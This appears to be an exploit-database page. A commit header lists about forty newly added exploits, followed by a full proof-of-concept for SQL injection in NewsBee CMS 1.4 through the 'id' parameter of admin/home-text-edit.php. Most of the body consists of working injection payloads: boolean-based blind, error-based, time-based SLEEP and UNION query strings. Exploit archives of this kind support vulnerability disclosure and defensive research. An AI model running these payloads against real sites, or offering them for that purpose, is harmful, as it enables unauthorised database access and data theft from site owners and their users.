7bbc323854
20 changes to exploits/shellcodes Siemens SIMATIC S7-1500 CPU - Remote Denial of Service Microsoft Edge Chakra JIT - Magic Value Type Confusion AMD / ARM / Intel - Speculative Execution Variant 4 Speculative Store Bypass Dell EMC RecoverPoint boxmgmt CLI < 5.1.2 - Arbitrary File Read MakeMyTrip 7.2.4 - Information Disclosure Linux 4.4.0 < 4.4.0-53 - AF_PACKET chocobo_root Privilege Escalation (Metasploit) Microsoft Windows - 'POP/MOV SS' Privilege Escalation Multiplayer BlackJack Online Casino Game 2.5 - Persistent Cross-Site Scripting Multiplayer BlackJack Online Casino Game 2.5 - Cross-Site Scripting Zechat 1.5 - SQL Injection / Cross-Site Request Forgery Healwire Online Pharmacy 3.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery Healwire Online Pharmacy 3.0 - Cross-Site Scripting / Cross-Site Request Forgery Private Message PHP Script 2.0 - Persistent Cross-Site Scripting Flippy DamnFacts - Viral Fun Facts Sharing Script 1.1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery Private Message PHP Script 2.0 - Cross-Site Scripting Flippy DamnFacts - Viral Fun Facts Sharing Script 1.1.0 - Cross-Site Scripting / Cross-Site Request Forgery ManageEngine Recovery Manager Plus 5.3 - Persistent Cross-Site Scripting ManageEngine Recovery Manager Plus 5.3 - Cross-Site Scripting Auto Dealership & Vehicle Showroom WebSys 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Admin Panel Authentication Bypass Auto Dealership & Vehicle Showroom WebSys 1.0 - Multiple Vulnerabilities Model Agency Media House & Model Gallery 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Authentication Bypass Wchat PHP AJAX Chat Script 1.5 - Persistent Cross-Site Scripting Model Agency Media House & Model Gallery 1.0 - Multiple Vulnerabilities Wchat PHP AJAX Chat Script 1.5 - Cross-Site Scripting Nordex N149/4.0-4.5 - SQL Injection WebSocket Live Chat - Cross-Site Scripting Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting PaulPrinting CMS Printing 1.0 - SQL Injection iSocial 1.2.0 - Cross-Site Scripting / Cross-Site Request Forgery ERPnext 11 - Cross-Site Scripting NewsBee CMS 1.4 - 'home-text-edit.php' SQL Injection Auto Car 1.2 - 'car_title' SQL Injection / Cross-Site Scripting NewsBee CMS 1.4 - 'home-text-edit.php' SQL Injection Feedy RSS News Ticker 2.0 - 'cat' SQL Injection NewsBee CMS 1.4 - 'download.php' SQL Injection Easy File Uploader 1.7 - SQL Injection / Cross-Site Scripting
39 lines
No EOL
1.3 KiB
Text
39 lines
No EOL
1.3 KiB
Text
# Exploit Title: NewsBee CMS 1.4 - 'home-text-edit.php' SQL Injection
|
|
# Dork: N/A
|
|
# Date: 2018-05-22
|
|
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
|
|
# Vendor Homepage: https://codecanyon.net/item/newsbee-fully-featured-news-cms-with-bootstrasp-php-mysql/19404937
|
|
# Version: 1.4 / fourth update
|
|
# Category: Webapps
|
|
# Tested on: Kali linux
|
|
|
|
# PoC: SQLi:
|
|
# Parameter: id
|
|
# Type: boolean-based blind
|
|
# Demo: http://target/NewsBee/admin/home-text-edit.php?id=5
|
|
# Payload:
|
|
|
|
Payload: id=5' AND 3563=3563 AND 'HmOW'='HmOW
|
|
|
|
# Type: error-based
|
|
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
|
|
# Payload:
|
|
|
|
id=5' AND (SELECT 7446 FROM(SELECT
|
|
COUNT(*),CONCAT(0x7178707871,(SELECT
|
|
(ELT(7446=7446,1))),0x7176716a71,FLOOR(RAND(0)*2))x FROM
|
|
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'rNYc'='rNYc
|
|
|
|
# Type: AND/OR time-based blind
|
|
# Demo: http://target/NewsBee/admin/home-text-edit.php?id=5
|
|
# Payload:
|
|
|
|
id=5' AND SLEEP(5) AND 'KdYd'='KdYd
|
|
|
|
# Type: UNION query
|
|
# Demo: http://target/NewsBee/admin/home-text-edit.php?id=5
|
|
# Payload:
|
|
|
|
id=-1714' UNION ALL SELECT
|
|
NULL,NULL,CONCAT(0x7162787871,0x51487655536a566c616e5156496a6a56426267495670596f644f466f554753504469636d4358694c,0x71766a7871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
|
|
WSZd&t=gallery |